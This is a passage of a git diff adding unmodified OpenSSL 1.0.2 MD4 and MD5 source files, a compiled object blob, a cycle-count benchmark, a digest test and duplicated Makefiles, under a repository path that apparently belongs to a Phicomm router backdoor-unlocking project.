+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#include <stdlib.h>
+#include <string.h>
+#include <openssl/opensslconf.h>
+#include <openssl/md4.h>
+
+#ifndef MD4_LONG_LOG2
+# define MD4_LONG_LOG2 2        /* default to 32 bits */
+#endif
+
+void md4_block_data_order(MD4_CTX *c, const void *p, size_t num);
+
+#define DATA_ORDER_IS_LITTLE_ENDIAN
+
+#define HASH_LONG               MD4_LONG
+#define HASH_CTX                MD4_CTX
+#define HASH_CBLOCK             MD4_CBLOCK
+#define HASH_UPDATE             MD4_Update
+#define HASH_TRANSFORM          MD4_Transform
+#define HASH_FINAL              MD4_Final
+#define HASH_MAKE_STRING(c,s)   do {    \
+        unsigned long ll;               \
+        ll=(c)->A; (void)HOST_l2c(ll,(s));      \
+        ll=(c)->B; (void)HOST_l2c(ll,(s));      \
+        ll=(c)->C; (void)HOST_l2c(ll,(s));      \
+        ll=(c)->D; (void)HOST_l2c(ll,(s));      \
+        } while (0)
+#define HASH_BLOCK_DATA_ORDER   md4_block_data_order
+
+#include "md32_common.h"
+
+/*-
+#define F(x,y,z)        (((x) & (y))  |  ((~(x)) & (z)))
+#define G(x,y,z)        (((x) & (y))  |  ((x) & ((z))) | ((y) & ((z))))
+*/
+
+/*
+ * As pointed out by Wei Dai <weidai@eskimo.com>, the above can be simplified
+ * to the code below.  Wei attributes these optimizations to Peter Gutmann's
+ * SHS code, and he attributes it to Rich Schroeppel.
+ */
+#define F(b,c,d)        ((((c) ^ (d)) & (b)) ^ (d))
+#define G(b,c,d)        (((b) & (c)) | ((b) & (d)) | ((c) & (d)))
+#define H(b,c,d)        ((b) ^ (c) ^ (d))
+
+#define R0(a,b,c,d,k,s,t) { \
+        a+=((k)+(t)+F((b),(c),(d))); \
+        a=ROTATE(a,s); };
+
+#define R1(a,b,c,d,k,s,t) { \
+        a+=((k)+(t)+G((b),(c),(d))); \
+        a=ROTATE(a,s); };\
+
+#define R2(a,b,c,d,k,s,t) { \
+        a+=((k)+(t)+H((b),(c),(d))); \
+        a=ROTATE(a,s); };
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/md4/md4_one.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/md4/md4_one.c
new file mode 100644
index 0000000..32ebd5f
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/md4/md4_one.c
@@ -0,0 +1,96 @@
+/* crypto/md4/md4_one.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#include <stdio.h>
+#include <string.h>
+#include <openssl/md4.h>
+#include <openssl/crypto.h>
+
+#ifdef CHARSET_EBCDIC
+# include <openssl/ebcdic.h>
+#endif
+
+unsigned char *MD4(const unsigned char *d, size_t n, unsigned char *md)
+{
+    MD4_CTX c;
+    static unsigned char m[MD4_DIGEST_LENGTH];
+
+    if (md == NULL)
+        md = m;
+    if (!MD4_Init(&c))
+        return NULL;
+#ifndef CHARSET_EBCDIC
+    MD4_Update(&c, d, n);
+#else
+    {
+        char temp[1024];
+        unsigned long chunk;
+
+        while (n > 0) {
+            chunk = (n > sizeof(temp)) ? sizeof(temp) : n;
+            ebcdic2ascii(temp, d, chunk);
+            MD4_Update(&c, temp, chunk);
+            n -= chunk;
+            d += chunk;
+        }
+    }
+#endif
+    MD4_Final(md, &c);
+    OPENSSL_cleanse(&c, sizeof(c)); /* security consideration */
+    return (md);
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/md4/md4_one.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/md4/md4_one.o
new file mode 100644
index 0000000000000000000000000000000000000000..6bafdc2f3b3acc13683ea1dcb39bb161446c5e14
GIT binary patch
literal 2024
zcmbu9PiqrV5WruusjW8M#wt>%$R1jWXqTj^s6{17lXN4i5!;AJ>#|9<O=+?z$p%sn
zij;~=t@Pl*qenl56!a5FKR^$Hf>KezgD7=o_q}wpY)%dgGxK{h^WMHc`#3FU{5~IH
z;v?6|VZ<mQZvuyY+;Zb&fCS0U!85-TceCcNL_TZ&P0Yz#V>p_Z*1xt&(q>>R43T7}
zM$6G1Y2$;zWzAh_t1=pt%x|ADb7RK{%jOT++-F2G_hs{wHTZVks<tz~aOvnrX%kwN
zq?p~<=&{nI_4h5=+*?S@Cl(S9-eKFe%uG*D3E_O9sT)n<iWn0k<Izh^D~vvxh=`HN
zb2hds@H0c8J)kqU^2ATb4l)iD<)m$h@8KQdYlVCx!QQ@Y*s!a>Pt&oNXfu51g+I*?
zZ*gf}cpi}W@Y9|Y|JvuT^5GOOB>CYaA4>9lw5FTEvj~vy2VUcx=SksO*=jqhIOyb-
zegHlP$8TrCkt59QupH^_h*`i9@2}yk-DFv|9Rf4tSiiMrz)pcW*I;K8a-j>q*oDWt
z@EcwD{VtqTOOr}X*Tf>Jim{1Ul-x{B5@kltB@?oe%VcKLbIM#IDW?@2QL_57VLAEL
zl4@v{n_1S?3d!A0-<qA3m10Fx^@c_irD3SW6{T2SQ5MzZ3M>HRgl+KNS*P;nz?N&2
z;|T^q8P7TRfP>@rpkO`^%JP>Gf*>CRW&8<35ahW3j0@nS;CfKoA~x2lhFTzE!>HS~
z%)Gi*QAI;*8AOCVP>EP*G>BNNRjZl~Os^T52ybiL`hFTO=}mF9UR%}b#u^c=4q91R
ztgBV6J>~y60u<w0a^L7UFcfzG?8we#KH3pb+?zP4Q?}_-+otdsSe%Ewgkj3hQtp14
zyL8-bu!mFd{$o#f{T@wnzZrKNg*@yTq4~`0QRh4Z)Ux@RodV8$XKKF}^vK0`hkuQZ
zI|Olv)(hY}h3y|>1#mFcT_2(K_gEse?)nAbUgswu1Yzfd=ZCedo^h|avF;h2{}r|P
oKV>~|oYfx%-+gvCE>O6FfkSA!HaQNSSN&zWe){`p=ez6w0gIW|hyVZp

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/md4/md4s.cpp b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/md4/md4s.cpp
new file mode 100644
index 0000000..c0ec97f
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/md4/md4s.cpp
@@ -0,0 +1,78 @@
+//
+// gettsc.inl
+//
+// gives access to the Pentium's (secret) cycle counter
+//
+// This software was written by Leonard Janke (janke@unixg.ubc.ca)
+// in 1996-7 and is entered, by him, into the public domain.
+
+#if defined(__WATCOMC__)
+void GetTSC(unsigned long&);
+#pragma aux GetTSC = 0x0f 0x31 "mov [edi], eax" parm [edi] modify [edx eax];
+#elif defined(__GNUC__)
+inline
+void GetTSC(unsigned long& tsc)
+{
+  asm volatile(".byte 15, 49\n\t"
+	       : "=eax" (tsc)
+	       :
+	       : "%edx", "%eax");
+}
+#elif defined(_MSC_VER)
+inline
+void GetTSC(unsigned long& tsc)
+{
+  unsigned long a;
+  __asm _emit 0fh
+  __asm _emit 31h
+  __asm mov a, eax;
+  tsc=a;
+}
+#endif      
+
+#include <stdio.h>
+#include <stdlib.h>
+#include <openssl/md4.h>
+
+extern "C" {
+void md4_block_x86(MD4_CTX *ctx, unsigned char *buffer,int num);
+}
+
+void main(int argc,char *argv[])
+	{
+	unsigned char buffer[64*256];
+	MD4_CTX ctx;
+	unsigned long s1,s2,e1,e2;
+	unsigned char k[16];
+	unsigned long data[2];
+	unsigned char iv[8];
+	int i,num=0,numm;
+	int j=0;
+
+	if (argc >= 2)
+		num=atoi(argv[1]);
+
+	if (num == 0) num=16;
+	if (num > 250) num=16;
+	numm=num+2;
+	num*=64;
+	numm*=64;
+
+	for (j=0; j<6; j++)
+		{
+		for (i=0; i<10; i++) /**/
+			{
+			md4_block_x86(&ctx,buffer,numm);
+			GetTSC(s1);
+			md4_block_x86(&ctx,buffer,numm);
+			GetTSC(e1);
+			GetTSC(s2);
+			md4_block_x86(&ctx,buffer,num);
+			GetTSC(e2);
+			md4_block_x86(&ctx,buffer,num);
+			}
+		printf("md4 (%d bytes) %d %d (%.2f)\n",num,
+			e1-s1,e2-s2,(double)((e1-s1)-(e2-s2))/2);
+		}
+	}
+
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/md4/md4test.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/md4/md4test.c
new file mode 100644
index 0000000..59f23bb
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/md4/md4test.c
@@ -0,0 +1,133 @@
+/* crypto/md4/md4test.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#include <stdio.h>
+#include <string.h>
+#include <stdlib.h>
+
+#include "../e_os.h"
+
+#ifdef OPENSSL_NO_MD4
+int main(int argc, char *argv[])
+{
+    printf("No MD4 support\n");
+    return (0);
+}
+#else
+# include <openssl/evp.h>
+# include <openssl/md4.h>
+
+static char *test[] = {
+    "",
+    "a",
+    "abc",
+    "message digest",
+    "abcdefghijklmnopqrstuvwxyz",
+    "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789",
+    "12345678901234567890123456789012345678901234567890123456789012345678901234567890",
+    NULL,
+};
+
+static char *ret[] = {
+    "31d6cfe0d16ae931b73c59d7e0c089c0",
+    "bde52cb31de33e46245e05fbdbd6fb24",
+    "a448017aaf21d8525fc10ae87aa6729d",
+    "d9130a8164549fe818874806e1c7014b",
+    "d79e1c308aa5bbcdeea8ed63df412da9",
+    "043f8582f241db351ce627e153e7f0e4",
+    "e33b4ddc9c38f2199c3e7b164fcc0536",
+};
+
+static char *pt(unsigned char *md);
+int main(int argc, char *argv[])
+{
+    int i, err = 0;
+    char **P, **R;
+    char *p;
+    unsigned char md[MD4_DIGEST_LENGTH];
+
+    P = test;
+    R = ret;
+    i = 1;
+    while (*P != NULL) {
+        EVP_Digest(&(P[0][0]), strlen((char *)*P), md, NULL, EVP_md4(), NULL);
+        p = pt(md);
+        if (strcmp(p, (char *)*R) != 0) {
+            printf("error calculating MD4 on '%s'\n", *P);
+            printf("got %s instead of %s\n", p, *R);
+            err++;
+        } else
+            printf("test %d ok\n", i);
+        i++;
+        R++;
+        P++;
+    }
+    EXIT(err);
+    return (0);
+}
+
+static char *pt(unsigned char *md)
+{
+    int i;
+    static char buf[80];
+
+    for (i = 0; i < MD4_DIGEST_LENGTH; i++)
+        sprintf(&(buf[i * 2]), "%02x", md[i]);
+    return (buf);
+}
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/md5/Makefile b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/md5/Makefile
new file mode 100644
index 0000000..390e5f1
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/md5/Makefile
@@ -0,0 +1,105 @@
+#
+# OpenSSL/crypto/md5/Makefile
+#
+
+DIR=    md5
+TOP=    ../..
+CC=     cc
+CPP=    $(CC) -E
+INCLUDES=-I.. -I$(TOP) -I../../include
+CFLAG=-g
+MAKEFILE=       Makefile
+AR=             ar r
+
+MD5_ASM_OBJ=
+
+CFLAGS= $(INCLUDES) $(CFLAG)
+ASFLAGS= $(INCLUDES) $(ASFLAG)
+AFLAGS= $(ASFLAGS)
+
+GENERAL=Makefile
+TEST=md5test.c
+APPS=
+
+LIB=$(TOP)/libcrypto.a
+LIBSRC=md5_dgst.c md5_one.c
+LIBOBJ=md5_dgst.o md5_one.o $(MD5_ASM_OBJ)
+
+SRC= $(LIBSRC)
+
+EXHEADER= md5.h
+HEADER= md5_locl.h $(EXHEADER)
+
+ALL=    $(GENERAL) $(SRC) $(HEADER)
+
+top:
+	(cd ../..; $(MAKE) DIRS=crypto SDIRS=$(DIR) sub_all)
+
+all:    lib
+
+lib:    $(LIBOBJ)
+	$(AR) $(LIB) $(LIBOBJ)
+	$(RANLIB) $(LIB) || echo Never mind.
+	@touch lib
+
+md5-586.s:	asm/md5-586.pl ../perlasm/x86asm.pl
+	$(PERL) asm/md5-586.pl $(PERLASM_SCHEME) $(CFLAGS) > $@
+
+md5-x86_64.s:	asm/md5-x86_64.pl
+	$(PERL) asm/md5-x86_64.pl $(PERLASM_SCHEME) > $@
+
+md5-ia64.s: asm/md5-ia64.S
+	$(CC) $(CFLAGS) -E asm/md5-ia64.S | \
+	$(PERL) -ne 's/;\s+/;\n/g; print;' > $@
+
+md5-sparcv9.S:	asm/md5-sparcv9.pl
+	$(PERL) asm/md5-sparcv9.pl $@ $(CFLAGS)
+
+files:
+	$(PERL) $(TOP)/util/files.pl Makefile >> $(TOP)/MINFO
+
+links:
+	@$(PERL) $(TOP)/util/mklink.pl ../../include/openssl $(EXHEADER)
+	@$(PERL) $(TOP)/util/mklink.pl ../../test $(TEST)
+	@$(PERL) $(TOP)/util/mklink.pl ../../apps $(APPS)
+
+install:
+	@[ -n "$(INSTALLTOP)" ] # should be set by top Makefile...
+	@headerlist="$(EXHEADER)"; for i in $$headerlist ; \
+	do  \
+	(cp $$i $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i; \
+	chmod 644 $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i ); \
+	done;
+
+tags:
+	ctags $(SRC)
+
+tests:
+
+lint:
+	lint -DLINT $(INCLUDES) $(SRC)>fluff
+
+depend:
+	@[ -n "$(MAKEDEPEND)" ] # should be set by upper Makefile...
+	$(MAKEDEPEND) -- $(CFLAG) $(INCLUDES) $(DEPFLAG) -- $(PROGS) $(LIBSRC)
+
+dclean:
+	$(PERL) -pe 'if (/^# DO NOT DELETE THIS LINE/) {print; exit(0);}' $(MAKEFILE) >Makefile.new
+	mv -f Makefile.new $(MAKEFILE)
+
+clean:
+	rm -f *.s *.o *.obj lib tags core .pure .nfs* *.old *.bak fluff
+
+# DO NOT DELETE THIS LINE -- make depend depends on it.
+
+md5_dgst.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+md5_dgst.o: ../../include/openssl/md5.h ../../include/openssl/opensslconf.h
+md5_dgst.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+md5_dgst.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+md5_dgst.o: ../../include/openssl/symhacks.h ../md32_common.h md5_dgst.c
+md5_dgst.o: md5_locl.h
+md5_one.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+md5_one.o: ../../include/openssl/md5.h ../../include/openssl/opensslconf.h
+md5_one.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+md5_one.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+md5_one.o: ../../include/openssl/symhacks.h md5_one.c
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/md5/Makefile.bak b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/md5/Makefile.bak
new file mode 100644
index 0000000..390e5f1
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/md5/Makefile.bak
@@ -0,0 +1,105 @@
+#
+# OpenSSL/crypto/md5/Makefile
+#
+
+DIR=    md5
+TOP=    ../..
+CC=     cc
+CPP=    $(CC) -E
+INCLUDES=-I.. -I$(TOP) -I../../include
+CFLAG=-g
+MAKEFILE=       Makefile
+AR=             ar r
+
+MD5_ASM_OBJ=
+
+CFLAGS= $(INCLUDES) $(CFLAG)
+ASFLAGS= $(INCLUDES) $(ASFLAG)
+AFLAGS= $(ASFLAGS)
+
+GENERAL=Makefile
+TEST=md5test.c
+APPS=
+
+LIB=$(TOP)/libcrypto.a
+LIBSRC=md5_dgst.c md5_one.c
+LIBOBJ=md5_dgst.o md5_one.o $(MD5_ASM_OBJ)
+
+SRC= $(LIBSRC)
+
+EXHEADER= md5.h
+HEADER= md5_locl.h $(EXHEADER)
+
+ALL=    $(GENERAL) $(SRC) $(HEADER)
+
+top:
+	(cd ../..; $(MAKE) DIRS=crypto SDIRS=$(DIR) sub_all)
+
+all:    lib
+
+lib:    $(LIBOBJ)
+	$(AR) $(LIB) $(LIBOBJ)
+	$(RANLIB) $(LIB) || echo Never mind.
+	@touch lib
+
+md5-586.s:	asm/md5-586.pl ../perlasm/x86asm.pl
+	$(PERL) asm/md5-586.pl $(PERLASM_SCHEME) $(CFLAGS) > $@
+
+md5-x86_64.s:	asm/md5-x86_64.pl
+	$(PERL) asm/md5-x86_64.pl $(PERLASM_SCHEME) > $@
+
+md5-ia64.s: asm/md5-ia64.S
+	$(CC) $(CFLAGS) -E asm/md5-ia64.S | \
+	$(PERL) -ne 's/;\s+/;\n/g; print;' > $@
+
+md5-sparcv9.S:	asm/md5-sparcv9.pl
+	$(PERL) asm/md5-sparcv9.pl $@ $(CFLAGS)
+
+files:
+	$(PERL) $(TOP)/util/files.pl Makefile >> $(TOP)/MINFO
+
+links:
+	@$(PERL) $(TOP)/util/mklink.pl ../../include/openssl $(EXHEADER)
+	@$(PERL) $(TOP)/util/mklink.pl ../../test $(TEST)
+	@$(PERL) $(TOP)/util/mklink.pl ../../apps $(APPS)
+
+install:
+	@[ -n "$(INSTALLTOP)" ] # should be set by top Makefile...
+	@headerlist="$(EXHEADER)"; for i in $$headerlist ; \
+	do  \
+	(cp $$i $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i; \
+	chmod 644 $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i ); \
+	done;
+
+tags:
+	ctags $(SRC)
+
+tests:
+
+lint:
+	lint -DLINT $(INCLUDES) $(SRC)>fluff
+
+depend:
+	@[ -n "$(MAKEDEPEND)" ] # should be set by upper Makefile...
+	$(MAKEDEPEND) -- $(CFLAG) $(INCLUDES) $(DEPFLAG) -- $(PROGS) $(LIBSRC)
+
+dclean:
+	$(PERL) -pe 'if (/^# DO NOT DELETE THIS LINE/) {print; exit(0);}' $(MAKEFILE) >Makefile.new
+	mv -f Makefile.new $(MAKEFILE)
+
+clean:
+	rm -f *.s *.o *.obj lib tags core .pure .nfs* *.old *.bak fluff
+
+# DO NOT DELETE THIS LINE -- make depend depends on it.
+
+md5_dgst.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+md5_dgst.o: ../../include/openssl/md5.h ../../include/openssl/opensslconf.h
+md5_dgst.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+md5_dgst.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+md5_dgst.o: ../../include/openssl/symhacks.h ../md32_common.h md5_dgst.c
+md5_dgst.o: md5_locl.h
+md5_one.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+md5_one.o: ../../include/openssl/md5.h ../../include/openssl/opensslconf.h
+md5_one.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+md5_one.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+md5_one.o: ../../include/openssl/symhacks.h md5_one.c
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/md5/Makefile.save b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/md5/Makefile.save
new file mode 100644
index 0000000..390e5f1
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/md5/Makefile.save
@@ -0,0 +1,105 @@
+#
+# OpenSSL/crypto/md5/Makefile
+#
+
+DIR=    md5
+TOP=    ../..
+CC=     cc
+CPP=    $(CC) -E
+INCLUDES=-I.. -I$(TOP) -I../../include
+CFLAG=-g
+MAKEFILE=       Makefile
+AR=             ar r
+
+MD5_ASM_OBJ=
+
+CFLAGS= $(INCLUDES) $(CFLAG)
+ASFLAGS= $(INCLUDES) $(ASFLAG)
+AFLAGS= $(ASFLAGS)
+
+GENERAL=Makefile
+TEST=md5test.c
+APPS=
+
+LIB=$(TOP)/libcrypto.a
+LIBSRC=md5_dgst.c md5_one.c
+LIBOBJ=md5_dgst.o md5_one.o $(MD5_ASM_OBJ)
+
+SRC= $(LIBSRC)
+
+EXHEADER= md5.h
+HEADER= md5_locl.h $(EXHEADER)
+
+ALL=    $(GENERAL) $(SRC) $(HEADER)
+
+top:
+	(cd ../..; $(MAKE) DIRS=crypto SDIRS=$(DIR) sub_all)
+
+all:    lib
+
+lib:    $(LIBOBJ)
+	$(AR) $(LIB) $(LIBOBJ)
+	$(RANLIB) $(LIB) || echo Never mind.
+	@touch lib
+
+md5-586.s:	asm/md5-586.pl ../perlasm/x86asm.pl
+	$(PERL) asm/md5-586.pl $(PERLASM_SCHEME) $(CFLAGS) > $@
+
+md5-x86_64.s:	asm/md5-x86_64.pl
+	$(PERL) asm/md5-x86_64.pl $(PERLASM_SCHEME) > $@
+
+md5-ia64.s: asm/md5-ia64.S
+	$(CC) $(CFLAGS) -E asm/md5-ia64.S | \
+	$(PERL) -ne 's/;\s+/;\n/g; print;' > $@
+
+md5-sparcv9.S:	asm/md5-sparcv9.pl
+	$(PERL) asm/md5-sparcv9.pl $@ $(CFLAGS)
+
+files:
+	$(PERL) $(TOP)/util/files.pl Makefile >> $(TOP)/MINFO
+
+links:
+	@$(PERL) $(TOP)/util/mklink.pl ../../include/openssl $(EXHEADER)
+	@$(PERL) $(TOP)/util/mklink.pl ../../test $(TEST)
+	@$(PERL) $(TOP)/util/mklink.pl ../../apps $(APPS)
+
+install:
+	@[ -n "$(INSTALLTOP)" ] # should be set by top Makefile...
+	@headerlist="$(EXHEADER)"; for i in $$headerlist ; \
+	do  \
+	(cp $$i $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i; \
+	chmod 644 $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i ); \
+	done;
+
+tags:
+	ctags $(SRC)
+
+tests:
+
+lint:
+	lint -DLINT $(INCLUDES) $(SRC)>fluff
+
+depend:
+	@[ -n "$(MAKEDEPEND)" ] # should be set by upper Makefile...
+	$(MAKEDEPEND) -- $(CFLAG) $(INCLUDES) $(DEPFLAG) -- $(PROGS) $(LIBSRC)
+
+dclean:
+	$(PERL) -pe 'if (/^# DO NOT DELETE THIS LINE/) {print; exit(0);}' $(MAKEFILE) >Makefile.new
+	mv -f Makefile.new $(MAKEFILE)
+
+clean:
+	rm -f *.s *.o *.obj lib tags core .pure .nfs* *.old *.bak fluff
+
+# DO NOT DELETE THIS LINE -- make depend depends on it.
+
+md5_dgst.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+md5_dgst.o: ../../include/openssl/md5.h ../../include/openssl/opensslconf.h
